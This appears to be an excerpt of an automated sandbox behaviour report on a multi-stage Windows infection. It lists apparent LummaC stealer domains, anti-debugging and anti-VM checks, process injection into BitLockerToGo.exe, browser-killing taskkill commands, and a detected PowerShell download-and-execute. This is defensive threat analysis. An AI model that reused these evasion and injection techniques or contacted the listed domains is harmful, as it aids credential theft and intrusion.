Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Dropped PE file which has not been started: C:\Users\user\DocumentsDHDHJJJECF.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7232	Thread sleep time: -52026s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7264	Thread sleep time: -58029s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3448	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3448	Thread sleep time: -78039s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4888	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4888	Thread sleep time: -80040s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3120	Thread sleep count: 291 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3120	Thread sleep time: -8730000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2260	Thread sleep count: 46 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2260	Thread sleep time: -92046s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7760	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3120	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe TID: 7868	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe TID: 7756	Thread sleep time: -32016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe TID: 7964	Thread sleep time: -210000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe TID: 7860	Thread sleep time: -38019s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe TID: 7856	Thread sleep time: -38019s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe TID: 1612	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe TID: 3452	Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe TID: 3964	Thread sleep time: -270000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5184	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe TID: 2716	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe TID: 6520	Thread sleep count: 117 > 30
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe TID: 6520	Thread sleep time: -702000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1716359573.0000000000B30000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1727138941.0000000000B30000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmp, 0d287ea527.exe, 00000009.00000002.2931591432.0000000000BA3000.00000040.00000001.01000000.0000000A.sdmp, 0d287ea527.exe, 00000009.00000002.2948928965.00000000058DB000.00000040.00000800.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.2966199886.00000000005E2000.00000040.00000001.01000000.0000000B.sdmp, 0d287ea527.exe, 00000012.00000002.2968434230.0000000000BA3000.00000040.00000001.01000000.0000000A.sdmp, 0d287ea527.exe, 00000012.00000002.3010388848.00000000065D2000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 0d287ea527.exe, 00000009.00000002.2925749591.00000000006AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: 0d287ea527.exe, 00000009.00000003.2544718457.0000000000706000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000002.2925749591.0000000000706000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2544883068.0000000000716000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW1
Source: 0d287ea527.exe, 00000012.00000002.3006911886.00000000058BB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMwareVMwarex
Source: 0d287ea527.exe, 00000009.00000003.2908312550.0000000000778000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}#
Source: skotes.exe, 00000006.00000002.2981894572.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2981894572.0000000001235000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2544718457.0000000000706000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000002.2925749591.0000000000706000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2544883068.0000000000716000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.2974865414.0000000001156000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2706092169.0000000001106000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2706721478.000000000110D000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000002.2978043891.0000000001106000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 0d287ea527.exe, 00000009.00000003.2908312550.0000000000778000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 0d287ea527.exe, 00000012.00000002.3006911886.00000000058BB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000003.1659011054.0000000000D11000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G^
Source: 0d287ea527.exe, 00000012.00000002.2978043891.00000000010A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWHp
Source: file.exe, 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1716359573.0000000000B30000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1727138941.0000000000B30000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmp, 0d287ea527.exe, 00000009.00000002.2931591432.0000000000BA3000.00000040.00000001.01000000.0000000A.sdmp, 0d287ea527.exe, 00000009.00000002.2948928965.00000000058DB000.00000040.00000800.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.2966199886.00000000005E2000.00000040.00000001.01000000.0000000B.sdmp, 0d287ea527.exe, 00000012.00000002.2968434230.0000000000BA3000.00000040.00000001.01000000.0000000A.sdmp, 0d287ea527.exe, 00000012.00000002.3010388848.00000000065D2000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: freecam.exe, 00000007.00000002.2681025759.000000000157E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_1-10834
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_2-10907
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_2-10868

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_05080C8E rdtsc

0_2_05080C8E

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3652B mov eax, dword ptr fs:[00000030h]	0_2_00F3652B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3A302 mov eax, dword ptr fs:[00000030h]	0_2_00F3A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_0097A302 mov eax, dword ptr fs:[00000030h]	1_2_0097A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_0097652B mov eax, dword ptr fs:[00000030h]	1_2_0097652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0097A302 mov eax, dword ptr fs:[00000030h]	2_2_0097A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0097652B mov eax, dword ptr fs:[00000030h]	2_2_0097652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0097A302 mov eax, dword ptr fs:[00000030h]	6_2_0097A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0097652B mov eax, dword ptr fs:[00000030h]	6_2_0097652B

Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe

Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: c4df60870c.exe PID: 3688, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0d287ea527.exe PID: 7244, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2580000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2580000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: freecam.exe, 00000007.00000002.2708343431.0000000011D7C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: moutheventushz.shop
Source: freecam.exe, 00000007.00000002.2708343431.0000000011D7C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: respectabosiz.shop
Source: freecam.exe, 00000007.00000002.2708343431.0000000011D7C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: bakedstusteeb.shop
Source: freecam.exe, 00000007.00000002.2708343431.0000000011D7C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: conceszustyb.shop
Source: freecam.exe, 00000007.00000002.2708343431.0000000011D7C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: nightybinybz.shop
Source: freecam.exe, 00000007.00000002.2708343431.0000000011D7C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: standartedby.shop
Source: freecam.exe, 00000007.00000002.2708343431.0000000011D7C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: mutterissuen.shop
Source: freecam.exe, 00000007.00000002.2708343431.0000000011D7C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: worddosofrm.shop
Source: 0d287ea527.exe, 00000009.00000002.2929219358.00000000009C1000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: scriptyprefej.store
Source: 0d287ea527.exe, 00000009.00000002.2929219358.00000000009C1000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: navygenerayk.store
Source: 0d287ea527.exe, 00000009.00000002.2929219358.00000000009C1000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: founpiuer.store
Source: 0d287ea527.exe, 00000009.00000002.2929219358.00000000009C1000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: necklacedmny.store
Source: 0d287ea527.exe, 00000009.00000002.2929219358.00000000009C1000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: thumbystriw.store
Source: 0d287ea527.exe, 00000009.00000002.2929219358.00000000009C1000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: fadehairucw.store
Source: 0d287ea527.exe, 00000009.00000002.2929219358.00000000009C1000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: crisiwarny.store
Source: 0d287ea527.exe, 00000009.00000002.2929219358.00000000009C1000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: presticitpo.store

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 26D4008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2580000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2581000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 25C1000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 25C4000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 25D4000	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe "C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe "C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe "C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe "C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe "C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0d287ea527.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T

Source: 2f0cb7128a.exe, 0000000B.00000000.2624310164.0000000000782000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: skotes.exe, skotes.exe, 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Program Manager
Source: 0d287ea527.exe, 00000009.00000002.2933867998.0000000000BEA000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: r!Program Manager
Source: firefox.exe, 0000001A.00000002.2838046479.000000D6B6BFB000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ?Progman

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_0095DD91 cpuid

6_2_0095DD91

Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
